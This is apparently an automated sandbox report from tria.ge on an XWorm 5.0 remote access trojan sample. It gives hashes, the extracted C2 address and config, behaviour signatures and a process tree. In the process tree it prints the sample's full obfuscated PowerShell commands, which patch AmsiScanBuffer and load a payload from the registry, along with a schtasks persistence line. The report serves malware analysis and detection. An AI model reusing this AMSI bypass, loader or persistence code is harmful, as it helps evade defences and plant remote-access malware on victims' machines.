Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
09/03/2025, 14:59
General
-
Target
XClient66.exe
-
Size
501KB
-
MD5
51e015f908d007651a56ba603c142b12
-
SHA1
8fe6b8e61426c8a49a778de6f18ce568d58f2a9d
-
SHA256
a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b
-
SHA512
e598ed359d23173889046499c4093c739a80a044724aae16c4bb483311f0ad80357df7b7dd10f9a6cf12084a4009b18927adde3210ec6bebdf8dd57da997a9ad
-
SSDEEP
12288:EItyU3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:RxkGTy
Score
10/10
Malware Config
Extracted
Family
xworm
Version
5.0
C2
client-presence.gl.at.ply.gg:50976
Mutex
ZVJ9lOsEvNQZTKC6
Attributes
-
Install_directory
%AppData%
-
install_file
DeadM.exe
aes.plain
Signatures
-
Detect Xworm Payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 14 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9842b9c7-c6ee-4a4c-aeba-06676c595fef}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{31051b3d-d68a-4745-9600-ef074c4159a4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDGsfkSmMVRO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zdLXQQTmasqnxe,[Parameter(Position=1)][Type]$UDmVczNTBH)$WNCgNwkMZXb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+'ect'+[Char](101)+''+'d'+'De'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'ubl'+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+','+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$WNCgNwkMZXb.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+'ci'+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+'By'+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zdLXQQTmasqnxe).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$WNCgNwkMZXb.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+'lic'+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+'S'+'l'+''+'o'+'t,'+'V'+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+'',$UDmVczNTBH,$zdLXQQTmasqnxe).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WNCgNwkMZXb.CreateType();}$OEbMSdLJyzwnf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+'so'+[Char](102)+''+[Char](116)+'.'+'W'+''+[Char](105)+'n'+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+'t'+[Char](104)+''+'o'+''+'d'+''+'s'+'');$jwXrArOliywBmG=$OEbMSdLJyzwnf.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+'d'+'d'+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OuadXyqQmtJtPdHAeQf=zDGsfkSmMVRO @([String])([IntPtr]);$ycskdmkeumizUsGLJnZaaY=zDGsfkSmMVRO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PKxlcQFsKVV=$OEbMSdLJyzwnf.GetMethod('G'+'e'+''+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$hJtEIJYKsWYaTB=$jwXrArOliywBmG.Invoke($Null,@([Object]$PKxlcQFsKVV,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+'r'+[Char](97)+'r'+'y'+'A')));$SXscTgcoYfiewDZzp=$jwXrArOliywBmG.Invoke($Null,@([Object]$PKxlcQFsKVV,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$PptZidj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hJtEIJYKsWYaTB,$OuadXyqQmtJtPdHAeQf).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+'ll');$ABpEHyAQVKtWEBMSi=$jwXrArOliywBmG.Invoke($Null,@([Object]$PptZidj,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+'n'+[Char](66)+'uf'+'f'+'e'+'r'+'')));$jXuKgrBqKY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SXscTgcoYfiewDZzp,$ycskdmkeumizUsGLJnZaaY).Invoke($ABpEHyAQVKtWEBMSi,[uint32]8,4,[ref]$jXuKgrBqKY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ABpEHyAQVKtWEBMSi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SXscTgcoYfiewDZzp,$ycskdmkeumizUsGLJnZaaY).Invoke($ABpEHyAQVKtWEBMSi,[uint32]8,0x20,[ref]$jXuKgrBqKY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](68)+''+'e'+''+[Char](97)+''+[Char](100)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rSCSvwEyXlCX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NNCTWWNsvOQVFg,[Parameter(Position=1)][Type]$fBMgbpPNss)$jsZOJWRLpQA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'De'+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'emo'+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+'l'+'as'+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$jsZOJWRLpQA.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NNCTWWNsvOQVFg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$jsZOJWRLpQA.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$fBMgbpPNss,$NNCTWWNsvOQVFg).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'time'+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'ged');Write-Output $jsZOJWRLpQA.CreateType();}$nAQtdZYQtRVqG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+'f'+'t'+'.'+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+'U'+'n'+'s'+[Char](97)+''+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+'h'+'o'+''+[Char](100)+''+[Char](115)+'');$DjCAFOsoqtqdgd=$nAQtdZYQtRVqG.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+'oc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ELWCxdxbVEpCoSjddnM=rSCSvwEyXlCX @([String])([IntPtr]);$SedFAEMsvYkrxwyFGaPUhZ=rSCSvwEyXlCX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YcbgnEwfVZj=$nAQtdZYQtRVqG.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'andl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$sbKWxanQnjlCmC=$DjCAFOsoqtqdgd.Invoke($Null,@([Object]$YcbgnEwfVZj,[Object]('L'+[Char](111)+'a'+'d'+''+[Char](76)+'i'+'b'+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$aGSflpgiUYUGVNNuU=$DjCAFOsoqtqdgd.Invoke($Null,@([Object]$YcbgnEwfVZj,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+'ot'+'e'+''+[Char](99)+''+[Char](116)+'')));$YDSRvln=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sbKWxanQnjlCmC,$ELWCxdxbVEpCoSjddnM).Invoke(''+'a'+''+[Char](109)+'si.'+[Char](100)+'l'+'l'+'');$wHiuCFlRnvqEnHmUN=$DjCAFOsoqtqdgd.Invoke($Null,@([Object]$YDSRvln,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+'ffer')));$qVXcxsjHqI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aGSflpgiUYUGVNNuU,$SedFAEMsvYkrxwyFGaPUhZ).Invoke($wHiuCFlRnvqEnHmUN,[uint32]8,4,[ref]$qVXcxsjHqI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wHiuCFlRnvqEnHmUN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aGSflpgiUYUGVNNuU,$SedFAEMsvYkrxwyFGaPUhZ).Invoke($wHiuCFlRnvqEnHmUN,[uint32]8,0x20,[ref]$qVXcxsjHqI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](68)+''+[Char](101)+''+[Char](97)+''+[Char](100)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Users\Admin\AppData\Roaming\DeadM.exeC:\Users\Admin\AppData\Roaming\DeadM.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\DeadM.exeC:\Users\Admin\AppData\Roaming\DeadM.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\DeadM.exeC:\Users\Admin\AppData\Roaming\DeadM.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\XClient66.exe"C:\Users\Admin\AppData\Local\Temp\XClient66.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadM" /tr "C:\Users\Admin\AppData\Roaming\DeadM.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\DeadR.exe"C:\Users\Admin\AppData\Local\Temp\DeadR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 00916eab79be692065b0cb519e73557a ojCLIaVUXkars93qeiDqqA.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
